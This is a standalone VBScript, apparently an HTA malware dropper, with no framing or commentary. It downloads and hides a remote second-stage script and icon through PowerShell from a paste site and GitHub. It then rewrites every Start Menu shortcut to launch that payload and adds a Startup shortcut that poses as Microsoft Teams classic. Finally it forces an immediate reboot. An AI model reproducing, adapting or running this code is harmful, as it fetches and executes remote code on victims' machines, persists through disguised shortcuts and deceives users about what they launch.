<script language="VBScript">
'// Setup | WScript
dim oShell: set oShell = CreateObject("WScript.Shell")

'// Setup | File System
dim fs: set fs = CreateObject("Scripting.FileSystemObject")

dim appData
appData = oShell.ExpandEnvironmentStrings("%AppData%")
 
dim localAppData
localAppData = oShell.ExpandEnvironmentStrings("%LocalAppData%")
 
dim startup
startup = appdata & "\Microsoft\Windows\Start Menu\Programs\Startup"

dim startMenu
startMenu = appdata & "\Microsoft\Windows\Start Menu\Programs"

'// Setup | Infect all lnks
dim lnksFile, lnksStream, lnk

oShell.run "cmd /c cd """ + startMenu + """ && dir /s /b | find /I "".lnk"" > lnk.txt",0,true
set lnksFile = fs.getFile(startMenu + "\lnk.txt")
set lnksStream = lnksFile.OpenAsTextStream()

'// Methods
sub infectAllLnks()
	'// Go through lnks
	if not lnksStream.AtEndOfStream Then
		'// Setup
		dim path
		path = lnksStream.ReadLine()
		
		if (not InStr(path, ".lnk") = 0) and (InStr(path, "Administrative") = 0) and (InStr(path, "File") = 0) and (InStr(path, "Recycle") = 0) then
			set lnk = oShell.createShortcut(path)
		else
			infectAllLnks()
			exit sub
		end if
		
		dim lnkTargetCache, lnkArgsCache
		lnkTargetCache = lnk.TargetPath + ""
		lnkArgsCache = lnk.Arguments
		lnkIconCache = lnk.IconLocation

		'// Modify shortcut
		if fs.FileExists(path) then
			lnk.TargetPath = appData & "\Microsoft\Teams\Update.vbs"
			lnk.IconLocation = lnkIconCache
			lnk.Arguments = "/launch:""" & lnkTargetCache + """"
			if not lnkArgsCache = "" then
				lnk.Arguments = lnk.Arguments & " /largs:""" & lnkArgsCache & """"
			end if
			lnk.Save
		end if
		
		'// Loop
		infectAllLnks()
	else
		lnksStream.close()
	end if
end sub

'// Install
oShell.run "cmd /c mkdir %appdata%\Microsoft & mkdir %appdata%\Microsoft\Teams", 0, true
oShell.run "cmd /c mkdir %localappdata%\Microsoft & mkdir %localappdata%\Microsoft\Teams"

oShell.run "cmd /c cd %appdata%\Microsoft\Teams&&powershell iwr https://raw.githubusercontent.com/FilthyPenny/boot/main/app.ico -O icon.ico", 0, true
oShell.run "cmd /c cd %appdata%\Microsoft\Teams&&del /f /s /q Update.vbs&powershell iwr https://bitbin.it/PXEBnYm4/raw/ -O Update.vbs&&attrib +s +h Update.vbs", 0, true

'// Back up start menu
oShell.run "cmd /c cd ""%appdata%\Microsoft\Windows\Start Menu""&& mkdir %userprofile%\.madx & attrib +s +h %userprofile%\.madx &&xcopy /y /e /i Programs %userprofile%\.madx\.startmenu",0,true

'// Infect all start menu shortcuts
infectAllLnks()

'// Auto-run
dim link: set link = oShell.createShortcut(startup & "\Microsoft Teams classic (work or school).lnk")
link.IconLocation = appData & "\Microsoft\Teams\icon.ico"
link.TargetPath = appData & "\Microsoft\Teams\Update.vbs" 
link.WorkingDirectory = localAppData & "\Microsoft\Teams"
link.Description = "Microsoft Teams classic (work or school)"
link.Save
 
'// Wrap Up
oShell.run "cmd /c attrib +s +h %appdata%.hta&&shutdown /r /f /t 0",0,false
</script>